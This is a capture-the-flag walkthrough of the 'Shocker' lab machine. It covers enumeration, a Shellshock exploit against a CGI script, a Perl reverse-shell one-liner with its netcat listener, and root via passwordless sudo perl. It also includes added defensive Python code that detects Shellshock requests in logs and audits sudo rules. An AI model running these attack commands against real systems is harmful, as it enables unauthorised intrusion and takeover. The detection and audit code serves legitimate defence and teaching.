Ping
ping 10.10.10.56

Nmap default Scan
nmap 10.10.10.56 -sC -sV -oN snmap

All port Scan
nmap 10.10.10.56 -p- --open -T5 -sC -sV -oN anmap

Port 80

Gobuster on port 80
gobuster dir -u http://10.10.10.56/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,bak,conf -s 200,204,301,302,307,403 -k --status-codes "" -o gobuster.txt
Nothing interesting.
Using dirb
dirb http://10.10.10.56 -o dirb.txt -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
We have found a new directory /cgi-bin
We will dig into /cgi-bin next; since CGI scripts are usually .sh or .cgi, we add those extensions to the Gobuster run.
gobuster dir -u http://10.10.10.56/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,bak,conf,sh,cgi -s 200,204,301,302,307,403 -k --status-codes "" -o gobuster_cgi-bin.txt
We found a new file, user.sh
Browsing to it prompts a download instead of rendering a page

Content of user.sh
A bash CGI script like /cgi-bin/user.sh is a classic Shellshock target
We will look for a Shellshock exploit that works against CGI scripts

We found one from Exploit-db https://www.exploit-db.com/exploits/34900

Slightly modified the exploit code to fit our target
Set the vulnerable path to /cgi-bin/user.sh
Then ran the exploit
python2 exp.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.7 lport=443
We have RCE; now we get a reverse shell
Reverse shell using Perl
perl -e 'use Socket;$i="10.10.14.2";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'

rlwrap nc -nvlp 4444
python3 -c 'import pty; pty.spawn("/bin/bash")'
Got a reverse shell and upgraded it to an interactive TTY using Python 3.
Got user.txt
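From the defender's side, the Shellshock request above leaves a very recognisable trace in the web server log: the bash function prefix "() {" lands in a header such as User-Agent or Referer, aimed at a script under /cgi-bin. The following detector is an added example written for this write-up, not code from the original page or from the exploit-db module it uses; the Apache combined-format log lines are constructed sample data, and the source IP, timestamps and paths in them are assumptions.

```python
import re
from typing import Dict, List

# Bash function-definition prefix that Shellshock abuses: "() {" ... "};"
# with optional whitespace between the tokens.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Apache "combined" log format: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log: two Shellshock probes (one via User-Agent, one via Referer)
# and two benign requests. The payload "id" is deliberately harmless.
SAMPLE_LOG = """\
10.10.14.7 - - [10/Oct/2021:12:00:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :;}; echo; /bin/bash -c 'id'"
10.10.14.7 - - [10/Oct/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 137 "-" "Mozilla/5.0"
10.10.14.7 - - [10/Oct/2021:12:00:03 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "() { :; }; /usr/bin/id" "curl/7.68.0"
10.10.14.7 - - [10/Oct/2021:12:00:04 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.68.0"
"""


def find_shellshock_attempts(log_text: str) -> List[Dict[str, str]]:
    """Return one record per log line whose request line, Referer or
    User-Agent carries a Shellshock function prefix."""
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        rec = m.groupdict()
        parts = rec["request"].split()
        path = parts[1] if len(parts) > 1 else rec["request"]
        # Check the header fields an attacker controls; stop at the first match.
        for field in ("ua", "referer", "request"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append({
                    "ip": rec["ip"],
                    "time": rec["time"],
                    "path": path,
                    "field": field,
                    "payload": rec[field],
                })
                break
    return hits


def summarize_by_source(hits: List[Dict[str, str]]) -> Dict[str, int]:
    """Count attempts per source IP, useful as an alert threshold input."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for h in find_shellshock_attempts(SAMPLE_LOG):
        print(f"{h['time']} {h['ip']} {h['path']} via {h['field']}: {h['payload']}")
    print(summarize_by_source(find_shellshock_attempts(SAMPLE_LOG)))
```

The combined format does not log Cookie or custom headers, which Shellshock can also ride in, so on a real host this check is a baseline, not a complete one; the durable fix is a patched bash, and mod_cgi should not hand request headers to a bash-backed script in the first place.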

Let's start with sudo permissions
sudo -l
Perl can be run through sudo without a password
We will use this to escalate our privileges
sudo perl -e 'exec "/bin/sh";'
We are in as root now
We got our root flag
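The root step works because a NOPASSWD sudo entry for an interpreter is the same as giving that user root. An administrator can catch this class of misconfiguration by auditing sudo -l output before an attacker does; the script below is an added example for this write-up, not code from the original page. The sudo -l text it parses is a constructed sample, the user name "webuser" and host "example-host" are assumptions, and the list of shell-capable binaries is an assumed, deliberately short list.

```python
import os
import re
from typing import Dict, List

# Interpreters and shells that can start an arbitrary process. NOPASSWD sudo on
# any of these is equivalent to full root. Assumed, non-exhaustive list.
RISKY_BINARIES = {
    "perl", "python", "python2", "python3", "ruby", "php", "node", "lua",
    "sh", "bash", "dash", "zsh",
}

# One "sudo -l" command entry: (runas) [TAG: ...] command[, command]
SUDO_ENTRY_RE = re.compile(
    r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

# Constructed sample output of "sudo -l" for a low-privileged web user.
SAMPLE_SUDO_L = """\
Matching Defaults entries for webuser on example-host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User webuser may run the following commands on example-host:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/systemctl restart apache2
"""


def parse_sudo_l(output: str) -> List[Dict[str, object]]:
    """Parse the command entries that follow the 'may run the following commands' line."""
    entries: List[Dict[str, object]] = []
    in_commands = False
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands or not line:
            continue
        m = SUDO_ENTRY_RE.match(line)
        if not m:
            continue
        entries.append({
            "runas": m.group("runas").strip(),
            "tags": re.findall(r"[A-Z]+", m.group("tags")),
            "commands": [c.strip() for c in m.group("cmds").split(",")],
        })
    return entries


def audit_entries(entries: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Flag entries that hand out a shell: 'ALL' or any shell-capable interpreter."""
    findings: List[Dict[str, object]] = []
    for e in entries:
        nopasswd = "NOPASSWD" in e["tags"]
        for cmd in e["commands"]:
            binary = os.path.basename(cmd.split()[0])
            if cmd == "ALL":
                reason = "unrestricted sudo"
            elif binary in RISKY_BINARIES:
                reason = f"{binary} can spawn a shell"
            else:
                continue
            findings.append({
                "runas": e["runas"],
                "command": cmd,
                "binary": binary,
                "nopasswd": nopasswd,
                "reason": reason,
            })
    return findings


if __name__ == "__main__":
    for f in audit_entries(parse_sudo_l(SAMPLE_SUDO_L)):
        flag = "NOPASSWD " if f["nopasswd"] else ""
        print(f"[!] ({f['runas']}) {flag}{f['command']}: {f['reason']}")
```

In the sample, the perl entry is reported and the systemctl entry is not. The fix is to drop the interpreter entry entirely and grant sudo only for the specific, argument-fixed command the user actually needs, as the second line already does.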

That’s it, we are done with Shocker…:)